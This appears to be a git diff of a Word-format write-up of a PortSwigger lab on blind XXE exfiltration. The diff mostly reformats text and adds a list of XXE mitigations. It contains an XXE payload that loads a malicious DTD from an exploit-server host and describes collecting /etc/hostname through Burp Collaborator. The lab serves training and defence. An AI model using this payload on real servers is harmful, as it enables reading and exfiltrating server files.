--- a/PortSwigger Labs/Server Side Topics/XML External Entity Injection/Lab x - Exploiting blind XXE to exfiltrate data using a malicious external DTD.docx
+++ b/PortSwigger Labs/Server Side Topics/XML External Entity Injection/Lab x - Exploiting blind XXE to exfiltrate data using a malicious external DTD.docx
@@ -43,7 +43,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>/etc/hostname file</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/hostname file</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -131,7 +147,27 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Send a Check Stock request and intercept the POST request in BurpSuite’s Proxy tab.</w:t>
+        <w:t xml:space="preserve">Send a Check Stock request and intercept the POST request in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Proxy tab.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -203,7 +239,27 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Replace the XML body of the request in BurpSuite’s Repeater with the Payload</w:t>
+        <w:t xml:space="preserve">Replace the XML body of the request in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Repeater with the Payload</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -254,7 +310,27 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">click Poll Now in the BurpSuite’s Collaborator Client and we see that we successfully </w:t>
+        <w:t xml:space="preserve">click Poll Now in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Collaborator Client and we see that we successfully </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -305,7 +381,47 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>We can go to BurpSuite’s Collaborator Client and in the HTTP request go to Request to Collaborator and in there we find a parameter named x and the value of that token is the secret key.</w:t>
+        <w:t xml:space="preserve">We can go to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Collaborator Client and in the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> request go to Request to Collaborator and in there we find a parameter named x and the value of that token is the secret key.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -494,7 +610,47 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>&lt;!DOCTYPE hacker [&lt;!ENTITY % xxe SYSTEM "https://exploit-0aed00e904f0d91a80ff1b030121008c.exploit-server.net/exploit.dtd"&gt; %xxe;]&gt;</w:t>
+        <w:t xml:space="preserve">&lt;!DOCTYPE hacker [&lt;!ENTITY % </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xxe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SYSTEM "https://exploit-0aed00e904f0d91a80ff1b030121008c.exploit-server.net/exploit.dtd"&gt; %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xxe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;]&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -533,16 +689,248 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Disable External Entity Processing:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> This is one of the most effective ways to prevent XXE attacks. Depending on your XML library or framework, this can often be done with a single setting or configuration change.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Patch and Update:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ensure that you are using the latest versions of XML libraries and parsers. Newer versions of libraries often have security patches for known vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Network Restrictions</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>: If possible, restrict server-side XML parsers from making arbitrary network requests. A properly configured firewall or similar network traffic monitor can block outbound traffic from the server to unknown domains.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Disable DTDs:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Disable Document Type Definitions (DTDs) in the XML parser configuration.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secure Configuration:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ensure that your XML parsers and processors are in a secure configuration, which means disabling or restricting any features you don't need, like inline document type definitions or external entities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Error Handling:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ensure that errors thrown by the XML parser don't leak server internals or provide any additional information that might assist an attacker.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Input Validation:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Validate and sanitize all input, especially XML data, to ensure only expected data formats are processed.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -736,11 +1124,103 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3D825B0F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="4CA824D6"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="484471290">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1210191738">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1378427903">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
